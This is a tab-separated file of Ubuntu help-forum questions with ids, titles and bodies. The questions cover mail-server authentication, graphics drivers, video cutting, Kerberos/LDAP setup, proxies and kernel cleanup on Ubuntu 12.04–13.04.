296390	how to make simple system user authentication work with postfix/dovecot on 12.10 ?	i have been wrestling on this a lot . i never properly understood but i presume that authentication by the system users is done with pam and the default authentication method for both dovecot and postfix on ubuntu . i have tried with and without ssl but when i run thunderbird on the same host , it figures out the configuration details but says the username or password is wrong . dovecot.conf : ssl = yes ssl_cert_file = /etc/dovecot/server.crt ssl_key_file = /home/andres/server.key mail_location=mbox : ~/mail : inbox : /var/mail/ % u # userdb passwd { # args = blocking=yes # } # passwd pam { # args = dovecot # } i read that i the commented out sections were required , however they cause dovecot to crash on start . host name : andres.pa10b mailserver address : mail.andres.pa10b ( internal domain ) main.cf ( postfix ) : myhostname = mail.andres.pa10b alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydomain = andres.pa10b myorigin = $ mydomain mydestination = mail.andres.pa10b , andres-virtualbox , localhost.localdomain , localhost , $ mydomain relayhost = mynetworks = 127.0.0.0/8 , 192.168.10.0/24 mailbox_size_limit = 1024000 recipient_delimiter = @ inet_interfaces = all inet_protocols = all local_recipient_maps = unix : passwd.byname $ alias_maps smtpd_sasl_type = dovecot smtpd_sasl_path = private/auth smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous smtpd_sasl_local_domain = $ myhostname smtpd_client_restrictions = permit_mynetworks , reject_unknown_client , permit smtpd_recipient_restrictions = permit_mynetworks , permit_auth_destination , permit_sasl_authenticated , reject smtpd_use_tls = yes smtpd_tls_cert_file = /etc/postfix/server.crt smtpd_tls_key_file = /home/andres/server.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache i could not find anything useful in logs . maybe i was n't paying attention . how should i continue my investigation ? thanks ! !
296392	would i benefit from switching to lubuntu or xubuntu ?	i just settled down with my ideal setup , a dual boot of windows 7 and ubuntu , but for some reason ubuntu 's running slow for me . i heard that ubuntu was pretty small and resource light , but should i switch to lubuntu or xubuntu ? it means a lot because i have all of my shared files on my linux partition so it would mean moving everything all over again . here are my specs from system monitor : ubuntu release 12.10 ( quantal ) 64-bi5 gnome 3.6.0 hardware memory : 2.9 gib processor : intel core 2 duo cpu t5850 @ 2.16ghz x2 graphics : nvidia geforce 8400m gs . the computer itself is from 2008 , i 'm really trying to squeeze all i can out of it . i 'll be on this page for the next couple of hours so i 'll respond to any replies . thanks in advance !
296393	how to set duration for avconv ?	i 'm trying to cut a portion from an mp4 video with avconv , but it does n't seem to care about the -t param . my command line is avconv -t 10 -i gopr0001.mp4 cut.mp4 this will process the whole video . at the same time ffmpeg works as expected with ffmpeg -t 10 -i gopr0001.mp4 cut.mp4 creating a 10 sec video . i 'm using avconv version 0.8.6-4:0.8.6-0ubuntu0.12.04.1 .
296399	installing ubuntu on lenovo u410	a couple of months ago i bought a lenovo u410 ( i5 ivy bridge , 8gb ram , 25gb ssd , 500gb hdd ) . great quality which i got real cheap . unfortunately it came infested with this thing called windows 8 . have not really had time to install ubuntu on it , but now i am going to take time . however , when checking around it seems like it will be a little more complicated than usually . so does anybody have any experience of doing it ? i would like to get rid of win 8 completely and likewise i was thinking of installing ubuntu on the ssd and using the hdd for dumb storage , will that be good setup ( not going to install any applications except eclipse and some other small media applications ) ? so far i have figured out that i must diasble the raid setup : unable to install 12.04 on a lenovo u410 ultrabook alternatively i migh also need to delete the raid partitions , use dmraid to remove the meta data and label the disks as 'gpt ' : http : //ubuntuforums.org/showthread.php ? t=2052975 or will that be needed only if i want a dual boot option ? ( wow to `` lable the disks as gpt '' ? ) also it seems like some people have had problems getting into bios after installing ubuntu : http : //forums.lenovo.com/t5/ideapad-y-u-v-z-and-p-series/lenovo-u410- can not -access-to-bios/td-p/877703 but all those people seem to have disabled uefi . i do not need to do that to install ubuntu , right ? so , does anybody have any helping comments for me ?
296403	whay apache2 does not process php files ?	i have installed apache server using tasksel from synaptic package manager . i did the following : sudo a2enmod php5 module php5 already enabled sudo a2enmod userdir module userdir already enabled sudo /etc/init.d/apache2 reload i have created two info.php files one for my home directory public_html and another one for /var/www next to the `` it works ! '' file with the following code : < ? php phpinfo ( ) ; ? > but when i navigate to either local addresses : localhost or localhost/~username i got a blank page and when i clicked view page source i found the same php code : < ? php phpinfo ( ) ; ? >
296411	how can i know if a certain service is running or not ?	the service utility allows to know the current status for the services installed in the system . however , when invocking service -- status-all some services are listed as [ + ] ( running ) , some as [ - ] ( stopped ) and some as [ ? ] ( unknown ? ) . how can i know wether a certain service ( from those marked as [ ? ] ) is running or not ? maybe i could say that i do n't need to use the service utility , just some mechanism to know which services are effectively running and which not .
296414	using qq : how can i make byobu the default terminal	i really like the byobu terminal better than the default gnome terminal that is installed with ubuntu . how can i make byobu the default terminal - for example , when i hit control/alt-t i 'd like to see byobu instead of the default gnome terminal ?
296417	how can i configure a launcher to show an application icon ?	some applications do n't display icons when you create a launcher for them - you get the default gnome launcher icon . how can i configure a custom launcher to show the icon ? they are visible on the launcher sidebar .
296418	optimus and external monitor	i own a lenovo t430 notebook . i successfully installed ubuntu 13.04 and bumblebee for supporting nvidia optimus . both the nvidia-304-updates and the nouveau driver work perfectly . however , i can not make the notebook run via an external monitor connected through hdmi to my docking station . i followed the instructions described below `` desktop on external monitor at the bumblebee-project , and created a file /etc/x11/xorg.conf as follows : section `` serverlayout '' identifier `` layout0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` nvs 5400m '' option `` nologo '' `` true '' option `` connectedmonitor '' `` dfp-3 '' endsection after booting , x does not start , and the follow error message appears in the logfile : [ 3.223 ] ( ii ) loadmodule : `` nvidia '' [ 3.224 ] ( ww ) warning , could n't open module nvidia [ 3.224 ] ( ii ) unloadmodule : `` nvidia '' [ 3.224 ] ( ii ) unloading nvidia [ 3.224 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) if i change xorg.conf to use the nouveau driver , the error message is the following : [ 3.385 ] ( ii ) loadmodule : `` nouveau '' [ 3.386 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 3.387 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 3.387 ] compiled for 1.13.3 , module version = 1.0.7 [ 3.387 ] module class : x.org video driver [ 3.387 ] abi class : x.org video driver , version 13.1 [ 3.387 ] ( ii ) nouveau driver date : wed mar 27 09:50:03 2013 +0100 [ 3.387 ] ( ii ) nouveau driver for nvidia chipset families : [ 3.387 ] riva tnt ( nv04 ) [ 3.387 ] riva tnt2 ( nv05 ) [ 3.387 ] geforce 256 ( nv10 ) [ 3.387 ] geforce 2 ( nv11 , nv15 ) [ 3.387 ] geforce 4mx ( nv17 , nv18 ) [ 3.387 ] geforce 3 ( nv20 ) [ 3.387 ] geforce 4ti ( nv25 , nv28 ) [ 3.387 ] geforce fx ( nv3x ) [ 3.387 ] geforce 6 ( nv4x ) [ 3.387 ] geforce 7 ( g7x ) [ 3.387 ] geforce 8 ( g8x ) [ 3.388 ] geforce gtx 200 ( nva0 ) [ 3.388 ] geforce gtx 400 ( nvc0 ) [ 3.388 ] ( ++ ) using vt number 7 [ 3.388 ] ( ee ) [ drm ] kms not enabled [ 3.388 ] ( ee ) no devices detected . in both cases , i have no idea how to proceed . please help , thank you !
296419	ubuntu 13.04 installation on vm hanged	i installed ubuntu 13.04 on virtual machine but during the installation of software in ( retrieving file 40 of 102 ) it is hanged and not going forward . would you please guide me what to do to solve the problem .
296421	configure snmp trap reciever	i am doing some work related to my thesis , and i 'm using ubuntu 12.04 . i need to receive snmp traps on this machine , however i 'm finding problems in configuring the snmpd deamon . can someone guide me how i can do this please ? i 'm quite a newbie in using linux so any help would be appreciated .
296422	nvidia ( gtx 680 ) drivers ubuntu 13.04 black screen	i 've been trying for two days now to get my computer running the nvidia drivers . i 'm running a gtx 680 and 64 bit architecture . i 've tried multiple things , here 's a few : additional drivers for my nvidia 680gtx not showing up in the additional drivers tool http : //linuxg.net/install-new-nvidia-drivers-nvidia-319-17-on-ubuntu-13-04-raring-ringtail/ http : //ubuntuforums.org/showthread.php ? t=2138983 http : //news.softpedia.com/news/how-to-install-latest-nvidia-drivers-in-ubuntu-13-04-350497.shtml the additional drivers tab shows nothing , but i have used sudo apt-get install nvidia-current and pretty much every other nvidia package i could find using apt-cache search nvidia i 've downloaded the .run file from nvidia 's website , and logged out , started a vty session , stopped lightdm , installed it , and rebooted , multiple times . no matter the approach , the outcome seems to be the same . the system boots , i can hear the splash screen , where i am supposed to log in , but the screen is black , and backlight is off . i ca n't get into any vty session like that , i have to reboot and add nomodeset to the boot options . i still get a black screen when i let it go to the login screen , but i can get in a vty session . regardless , i have yet to be able to fix it . edit 1 not sure of the importance , but i am running a 2560x1600 native resolution monitor , if that somehow plays into it at all .
296427	when prompted what does administrative password refer to ?	when prompted for an administrative password , what exactly does that mean ? i 'm trying to run a few programs but they are asking for my adminstrative password , but i have no clue what that means . i'mm trying to use things like unetbootin and remastersys , but running those requires that i enter the administrative password . i have no clue what it is , given i put in my user account password it says its the wrong password and im the only user on . when i type anything sudo in terminal that password works but when it shows me a message asking for it i dont know what it is ... .. can anyone help me find it or tell me what it is ?
296433	synaptics touchpad pressure monitoring ? ( shm no longer seems to exists )	i 'm thinking of making an application that uses the pressure information from a synaptics touchpad . it used to be that you could at least monitor this using synclient -m [ interval ] , but from my understanding the shmconfig option required to do so has been removed in recent versions . does anyone have any suggestions for getting pressure ( and other ) information from the touchpad ? thanks !
296435	how to solve âthe system is running in low graphics modeâ in ubuntu 12.04 ?	i have ubuntu 12.04 installed and it was working fine . but today suddenly it stopped responding , then i restart it and gives a window the system is running in low graphics mode , your screen , graphics card , and input device settings could not be detected correctly . you will need to configure this yourself . i have seen many people suggest for different commands to resolve this issue . but i ca n't try any of them as my laptop does n't start . just show the error message and nothing happens . i also tried the recovery mode but same thing happens . how can i resolve this issues . thanks
296441	numdisplay download	i am first year physics undergrad . i am trying to follow a tutorial on simulations using python . however , a requirement is the download of numdisplay package . as i am a new user of ubuntu , i was wondering if you could provide me with the exact commands to write in the terminal to obtain the download .
296444	creating an encrypted sparse image	on mac os x i had the option of creating an encrypted sparse image . i had this automount at boot and used it to store files that i wanted encrypted ( tax documents , bank statements , or other personally identifiable information ) . it was useful because i do n't want to encrypt my entire home directory , or my entire hard drive ; the number of files i actually keep encrypted is pretty small so it could still be conveniently backed up to the cloud as a single file , preserving my private documents without making them accessible if someone were to gain access to that data somehow . i 'm curious if there is an analog to this on ubuntu ( or linux in general ) or if there is at least a means to achieve the same ends . i know i can create an encrypted hard drive partition , but i do n't want to do this because i want to minimize the space used while still leaving room for growth , and i want to be able to sync the file to the cloud ( with a small image this is not a huge issue ) . i know i can encrypt my home directory but this is not what i want to do either . i do n't want to encrypt things like music , movies , configuration files , or most of the work i do since i do n't care about keeping them private and i want to be able to sync a lot of it without having to update a huge blob every time i sync . i suppose theoretically i can store all my personal files in another directory and symbolically link to them from my encrypted home , but i 'm still not sure if this accomplishes what i want ( can i backup the blob somewhere and restore on another ( not necessarily ubuntu or linux ) machine ? ) or if it would cause too much of a hassle . i 've found some information about creating and mounting sparse images , but nothing i found mentioned enabling encryption . any ideas ?
296445	no sound on tv with hdmi , ubuntu 13.04	i have connected my gateway laptop to my tv with an hdmi cord a million times , and i 'm aware that you have to go into sound settings and select hdmi audio . however , since upgrading to 13.04 there is no hdmi audio option in the sound settings . i 'm assuming i need to install something , but i 'm not sure what . viewing the other questions on the same problem directed me here : https : //code.launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily/+packages but i have no idea what to do from there .
296446	how to boot into linux on a regular basis with a grub that has windows as the default ?	in a pc using windows , i 'd like to schedule a boot into linux every x days ( alternatively every x bootstraps ) . is there a way to have grub2 make this timed , cron-like , boot ?
296449	12.04 resolution changes on lock + kvm	i 'm running ubuntu 12.04 and using a monitor that i share with a windows laptop via a kvm . when i login to ubuntu my resolution is 1900x1200 , but when i use the kvm to toggle over to my laptop and then ubuntu locks , when i kvm back my resolution is set super low . when i open `` displays '' it automatically corrects my resolution back to 1900x1200 , and the resolution is fine if i use the kvm to toggle back to ubuntu before it locks . i 've seen the suggests this post with suggestions on either creating a bash script to set resolution ( which seems hacky ) or using x settings in xorg.conf , but my symptoms seem different than the ones described in that issue so i did n't want to just blindly try those suggestions . help is much appreciated !
296455	how do i set facebook , twitter and gmail accounts in the ubuntu 13.04 online accounts ?	yesterday i updgraded my ubuntu 12.10 to ubuntu 13.04 . i have apparently set my twitter and my google account ( gmail , google+ , google docs , etc . ) but i have n't could set my facebook account . when i try to set my facebook account , firefox is launched and after i give the respective permissions to ubuntu , it loads a page telling me the following : success advertencia de seguridad : trata la direcci贸n url como si fuera tu contrase帽a y no la compartas con nadie . i do n't know what this is about . i also have noticed that when i click on the envelope ( next to the ubuntu one switch ) , the only options i can see are those related to my chat status ( available , away , busy , invisible , and offline ) and the one called `` clear '' . i can not see neither the integration of my twitter nor google accounts .
296457	unity progress bar for gnome-terminal ?	one of my favorite features of unity is the progress bar the launcher overlays on the icons for various programs like the file manager , or firefox . gnome-terminal does not have a progress bar . what do i need to do for unity to display the status of apt-get or dd etc ? if this is not possible can we at least change the icon when a prompt is available ?
296458	unity .desktop actions internationalization and localization ?	how can we translate desktop action names ? is it supported by quickly , launchpad ?
296465	can i make the system to check checksums of all the binary files installed ?	i 've found a bad bit in my ram and still experience some notable bugs after replacing it . i suspect some binaries could get corrupted during installation . can the system check the installed binaries checksums based on the packages metadata ?
296472	how do i use arandr to create a permanent monitor layout in lubuntu 12.10 ?	so arandr is great for setting up my monitor layout in lubuntu 12.10 but even if i save the layout to the ~/.screenlayout it does n't seem to save that layout no matter what i call the file .
296484	unable to access 126 gb volume	in first place , sorry for my english . after that , i want to say that im a newbie , its the first time i have used ubuntu . i have this message error when i tried to access mi 126gb volume : i looked for info in this page , but any post talked about that , or i didnt found it ( maybe i didnt understand , its possible too ) . the idea was recovery some info of my pc ( windows dont reach at desktop ) through ubuntu for copypaste all interesting files to a hdd . later , reinstall windows . so , i dont know if this message error is common or not , and if it has any possible solution . thanks a lot , and sorry for my english , again . im from spain , i had very bad english teachers at school : p .
296498	app install problems to 13.04	has ubuntu 13.04 a new set of installation procedures from 12.04 , and what are they please ? an install of 13.04 has problems with certain installs of software , all that install correctly to a load of 12.04 . does google chrome downloaded from google install to 13.04 , and by what utility please ? google chrome installed from the google site dot deb download file throws error `` dependency is not satisfiable : libudev0 ( > = 147 ) '' , will not install . the same download installs and functions from 12.04 . did i make a load error , is there a package error , or is some different utility needed please ? does libre office total package from ubuntu software center install to 13.04 , and by what utility please ? libre office total package downloaded from ubuntu software site installs seemingly completely , and seems to operate well , but after installation the 13.04 installer for any subsequent install of any software seems to function well but keeps ending with an error , throwing the error : errors were encountered while processing : browser-plugin-libreoffice dpkg : error processing browser-plugin-libreoffice ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . did i make a load error , is there a package error , or is some different utility needed please ? does vmware player downloaded from vmware install to 13.04 , and by what utility please ? vmware player installed from vmware site dot package download file tries to run from terminal command line `` sudo bash vmwarexxxx.package '' , but fails to start the vmware installer , instead the license information simply appears in the terminal endlessly looping with keystrokes entered . the same command line used in 12.04 correctly loaded the vmware installer and vmware . btw , oracle vm virtualbox installs and runs correctly on both 12.04 and 13.04 . did i make a load error , is there a package error , or is some different utility needed please ? all of the above i have in use on a load of 12.04 , working well , only 13.04 seems to throw errors on the install , and of fifty or more apps these are the only three throwing an install error to date .
296500	went from win 7 to unbuntu 12.04 installed fine now crashes	i did a complete overhaul of my box and got rid of winblows \0/ yay ! ! and the install went very smoothly . was very impressed with the ease of the install and the ease of use with ubuntu ... . til now.. was in a virtual world and noticed the graphics were not as nice as a windows machine.. actually they are pretty bad so i got this wild hair and went looking for drivers and found nvidia drivers for linux version 310 i believe.. anyway installed them rebooted and boom talk about a sloooowwwwwwwwwww machine omg.. then it black screened on me over and over again , wouldnt even boot from cd saying there was an internal error and crashed.. didnt even have time to read.. so i happily reinserted the install and guess what .. dang thing wont install.. more error messages .. so im sitting here with a machine no os and uh this little girl is not happy.. any help out there fellas ?
296501	brightness error on ubuntu but not windows	every time i open my computer the brightness is always either on high or low , even though i already set it at about 65 % . when i 'm using windows 8 , i do n't have this kind of error ( maybe ) . how can i fix this ?
296503	where to place a downloaded file to install a nic driver ?	i need to install a driver for an atheros wired nic . but since i do not have a connection through ubuntu , i will have to make a download from my winxp pc . once i have the download and can transfer it to my ubuntu pc , where should i place it to make the install ?
296515	sublime text ctrl+p opens print dialog	i 'm using sublime text 2 in ubuntu and on my mac hitting command+p it lets me quickly select which file i want to open . in ubuntu hitten ctrl+p opens a print dialog . how can i disable that functionality in ubuntu for sublime text ?
296523	which software should i add to ubuntu server 13.04 to host media files and stream them to my wd tv live	i am new to ubuntu server and would like to use it to host media files and download new media files and stream them to my western digital tv live media player . while installing ubuntu server 13.04 , i get to choose which software to install with it . which one should i choose ( if any ) ?
296525	x screen is broken after upgrading from 12.04 to 12.10	i had a perfectly working system running ubuntu 12.04 . after upgrading to 12.10 , my x screen is `` broken '' ( i do n't know how to describe this in words ) . some parts of the screen are still legible , but other parts have lots of `` garbage '' , especially the lower part . when i move the mouse , the cursor also leaves some traces . everything else is fine , including vnc . i see similarly `` broken '' screen also through vnc , though . ( the last screen is captured through vnc . ) i had never needed to know the graphics driver , but lshw -c video shows product : vt8375 [ prosavage8 km266/kl266 ] and vendor : s3 inc. how can i fix this problem ?
296527	segmentation fault ( core dumped ) webcam	when i try to use skype , cheese or set up the video input for my webcam it abruptly closes . having the terminal opened , i found out that it is giving me the error : segmentation fault ( core dumped ) and it closes . i do n't know if my webcam is just too old , or if there is something wrong . i have a genius express 84008 webcam . i 'm running ubuntu 12.04 , and i do n't know what else i can do .
296528	different wallpapers for each workspace in ubuntu 13.04 . fusion extra 's not available . is there another fix ?	i have been looking everywhere for an answer to my question . tries just about every guide there is and went through all of the ubuntu forums . this is not a duplicate question as the answers to the questions similar do not fit my question . i have tried all of the answers and none have worked . i have compiz extra 's and there is no compiz fusion extras . i have the deskcube working with background image , but i want different wallpapers for each area . i am trying to have four different wall papers for each workspace . i have compiz and have tried to find wallpapers under utility but the option is not there . i have all updates and extras installed that i can find . is this just something that is n't possible ? i use my workspaces for different things and it gets annoying remembering which is which , even with a heading for each workspace . i am running ubuntu 13.04 currently and have looked all over for an answer . i have found questions with answers but none that seem to work . there is no wallpaper option in compiz but the fix to that is to get fusion extras and that wo n't work . have tried to get sudo apt-get install compiz-fusion-plugins-extra with the terminal and it tells me 'unable to locate package ' if anyone knows please help me out !
296534	flash player is not working	i installed flash for mozilla firefox , via ubuntu software center and via terminal . i have mozilla , chromium and google chrome installed and flash content is not showed . for example i go to youtube and the flash player remains white as the background and nothing happen . i want to use google chrome , so there i get 'could not load shockwave flash'.i searched some solutions and i found that i have to delete ~/.config/google-chrome/pepperflash.some users succeded.but i stil have this error.i rebooted the system and now google chrome crashes frequently .
296536	memory allocation of c++ in ubuntu	first of all , i 'm sorry if the question does n't belong here . i want to make sure whether this issue has to do something with my ubuntu . the c++ code below makes 2621440 integer variables . each integer requires 4 bytes from the memory . so , 2621440 integers would take ( 2621440 * 4 = ) 10mb from the virtual memory . the problem i 'm having is , this program occupies nearly 80mb of memory , for no reason . i monitored the the memory usage from system monitor and the top command as well . int main ( ) { int *p ; for ( int n=0 ; n < 2621440 ; n++ ) { p = new int ; } } i 'm on kubuntu 13.04 ( amd64 ) please give me a little explanation . thanks !
296537	ubuntu : kerberos with ldap	i am using ubuntu 12.04 . i am installing ldap with kerberos authentication . i followed the steps in the ubuntu documentation . https : //help.ubuntu.com/12.04/serverguide/kerberos-ldap.html after installation , when i am using kadmin.local command , it says invalid credentials . here is the output . # kadmin.local authenticating as principal root/admin @ csez.zohocorpin.com with password . kadmin.local : invalid credentials while initializing kadmin.local interface my configuration files krb5.conf https : //docs.zoho.com/writer/published.do ? rid=cm31cdf3431525e96401bba98532403b252bb kdc.conf https : //docs.zoho.com/writer/published.do ? rid=cm31c3c78ac3564e6478ea82f9912cef72f8f ldap.conf https : //docs.zoho.com/writer/published.do ? rid=cm31c7470b21437134f50bedf0d3c1b9fbafb service.keyfile cn=admin , dc=csez , dc=zohocorpin , dc=com # { hex } 5153437668693132 what am i doing wrong ?
296538	how to connect to wi fi in dell vostro 2420 ?	i am not able to connect to the wi-fi in my area please help me out how to connect to the wi-fi from the starting . i have recently bought my new laptop dell vostro 2420. how to connect wi-fi to this ? ? ?
296540	how to add drives shortcut link to folder view widget in kubuntu	how can i add shortcut links to my drives ( disk ) shortcut link to folder view widget in kubuntu . i want to add these shortcut links because i can directly go to my drives without selecting dolphine from start menu . what i have done so far -inside folder view widget i clicked 3rd mouse key and selected create new > > basic link to file or directory then i selected the drives ( disk ) path and made a link to the disk in folder view widget . but the problem is whenever i restart the system those shortcut links are not working anymore and again i have to make a new shortcut link for the drives . can you tell me how i can make a shortcut links in it , i am a noob in kubuntu
296543	installing ubuntu on an asus vivotab smart windows 8 32-bit processor tablet	good day , i just got an asus vivotab smart with windows 8 but the processor is actually a 32-bit type . i am kinda confused with the ubuntu version to install ( 32-bit or 64-bit ) . i have read all the tips and guidelines on installing ubuntu on a windows 8 machine . i have disabled fast boot , quiet boot , secure boot , and still can not boot from the usb . i tried this with ubuntu 12.04.2 , 12.10 , and 13.04 ( the 64-bit versions only ) . i am yet to try a 32-bit version but i 'm reluctant since canonical says only the 64-bit version was developed to handle the windows 8 uefi issues . also , i have a boot-override field in my uefi options which i think force-boots from the boot option one selects . i selected to force-boot from my pendrive containing ubuntu , but the screen just blinks momentarily and nothing happens . please help me to figure out how to load ubuntu on my machine . i do n't really want the windows 8 ... ... just ubuntu on my tablet . thank you .
296544	nis client authentication	how to configure the nis client on ubuntu ? and how to configure system authentication ? there is no option for system authentication like system setting system info in my system etc . when ever i go to software center and search them nis authentication then i have one package for nis authentication and i try to install them then one error occur that is remove hostname utility . when i try to remove hostname utility then it does not remove .
296563	where synaptic touchpad settings in user account ?	i have some trouble with my `` synaptics touchpad '' the touchpad is one of those that use the psmouse kernel module ( i.e . modprobe psmouse will get the pad to work [ mouse moves ] and modprobe -r psmouse unloads it and the mouse does not work anymore ) . my problem is that in one ( my main ) user account the touchpad stopped working . but only in that user account , it is still working on the login screen and in other user accounts . my question is where could be the user-account specific settings linked to the touchpad . it seems to me that there must be some settings that are linked to my account that cause the touchpad not to work anymore . it is still shown in the output of xinput user @ box : ~ # xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] output from xinput list user @ mybox $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ integrated camera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=12 [ slave keyboard ( 3 ) ] i can get the mouse to work using this commands sudo modprobe -r psmouse sudo modprobe psmouse proto=imps the whole problem seems very odd to me since i thought the settings to mouse and x-server are more made `` outside the user account settings '' . i am happy for a hint where to find the `` account specific touchpad settings '' i use 12.04 ubuntu
296564	can not access any host from shell while they are accessible from firefox/chrome	os is under a proxy . i use cntlm . company adds a root certificate to all certificates . i have a problem accessing any host from shell . for example : svn checkout http : //svn.apache.org/repos/asf/spamassassin/trunk spamassassin returns svn : options of 'http : //svn.apache.org/repos/asf/spamassassin/trunk ' : could not connect to server ( http : //svn.apache.org ) ping command behaves the same : ping svn.apache.org ping svn.geo.apache.org ( 160.45.251.2 ) 56 ( 84 ) bytes of data . is stuck forever . is there something i have missed in configuration ? ============= update i have finally fixed the problem with remote port forwarding from a windows machine .
296566	can i copy a machine from virtualbox	i want to format my laptop and i 'm wondering if i can copy a virtual machine ( windows 7 ) , so i do not have to recreate it after formatting like in vmware i just have to copy the file of the machine and run it everywhere i want , if i can how , and if not why ? ? thx
296569	how does java check version online	i 'd like to know how does java check his version when facing an applet online . does it phonecalls a particular site ? how can i get that site ?
296578	i have purged the current kernel !	help - i have purged the current kernel ( linux-image-2.6.32-43-server ) and can not reinstall because the boot sector is full . how can i clear the boot sector to reinstall the kernel ? $ ls /boot abi-2.6.32-44-server initrd.img-3.2.0-39-generic abi-3.2.0-34-generic initrd.img-3.2.0-40-generic abi-3.2.0-35-generic initrd.img-3.2.0-41-generic abi-3.2.0-36-generic lost+found abi-3.2.0-37-generic memtest86+.bin abi-3.2.0-38-generic memtest86+_multiboot.bin abi-3.2.0-39-generic system.map-2.6.32-44-server abi-3.2.0-40-generic system.map-3.2.0-34-generic abi-3.2.0-41-generic system.map-3.2.0-35-generic config-2.6.32-44-server system.map-3.2.0-36-generic config-3.2.0-34-generic system.map-3.2.0-37-generic config-3.2.0-35-generic system.map-3.2.0-38-generic config-3.2.0-36-generic system.map-3.2.0-39-generic config-3.2.0-37-generic system.map-3.2.0-40-generic config-3.2.0-38-generic system.map-3.2.0-41-generic config-3.2.0-39-generic vmcoreinfo-2.6.32-44-server config-3.2.0-40-generic vmlinuz-2.6.32-44-server config-3.2.0-41-generic vmlinuz-3.2.0-34-generic grub vmlinuz-3.2.0-35-generic initrd.img-2.6.32-44-server vmlinuz-3.2.0-36-generic initrd.img-3.2.0-34-generic vmlinuz-3.2.0-37-generic initrd.img-3.2.0-35-generic vmlinuz-3.2.0-38-generic initrd.img-3.2.0-36-generic vmlinuz-3.2.0-39-generic initrd.img-3.2.0-37-generic vmlinuz-3.2.0-40-generic initrd.img-3.2.0-38-generic vmlinuz-3.2.0-41-generic $ sudo apt-get purge linux-image-3.2.0-3* reading package lists ... done building dependency tree reading state information ... done note , selecting 'linux-image-3.2.0-38-lowlatency ' for regex 'linux-image-3.2.0-3*' note , selecting 'linux-image-3.2.0-1615-armadaxp ' for regex 'linux-image-3.2.0-3*' [ ... cut ... ] package linux-image-3.2.0-39-lowlatency is not installed , so not removed package linux-image-3.2.0-40-lowlatency is not installed , so not removed package linux-image-3.2.0-41-lowlatency is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . linux-image-server : depends : linux-image-3.2.0-43-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . dpkg output $ dpkg-query -l linux-image* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un linux-image < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) un linux-image-2 . < none > ( no description available ) rc linux-image-2 . 2.6.32-34.77 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-35.78 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-36.79 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-37.81 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-38.83 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-39.86 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-40.87 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-41.91 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-42.96 linux kernel image for version 2.6.32 on x86 rc linux-image-2 . 2.6.32-43.97 linux kernel image for version 2.6.32 on x86 ii linux-image-2 . 2.6.32-44.98 linux kernel image for version 2.6.32 on x86 un linux-image-3 . < none > ( no description available ) ii linux-image-3 . 3.2.0-34.53 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.2.0-35.55 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.2.0-36.57 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.2.0-38.61 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.2.0-41.66 linux kernel image for version 3.2.0 on 64 b in linux-image-3 . < none > ( no description available ) iu linux-image-se 3.2.0.43.51 linux kernel image on server equipment .
296581	ca n't login to gui , only to tty1-6 , /bin is not included in the path environment	i was trying to make the brightness controls work after i had made a clean reinstall of ubuntu 12.04 on my gateway computer , based on this thread , and proceeded to restart because i also had a few updates to be done . next thing i know , i ca n't login into the desktop gui , it flashes a black screen , and gets me back to the login screen . i then opened up tty6 and logged in with my user and password . i logged in ok , but then immediately this came up : -bash : groups : commmand not found command 'uname ' is available in '/bin/uname' the command could not be located because /bin is not located in the path environment variable : uname : command not found -bash : [ : = : unary operator expected ... . several more lines like that and then the command line . please help ! maybe i mistyped something when editing the grub file . how would i fix this ?
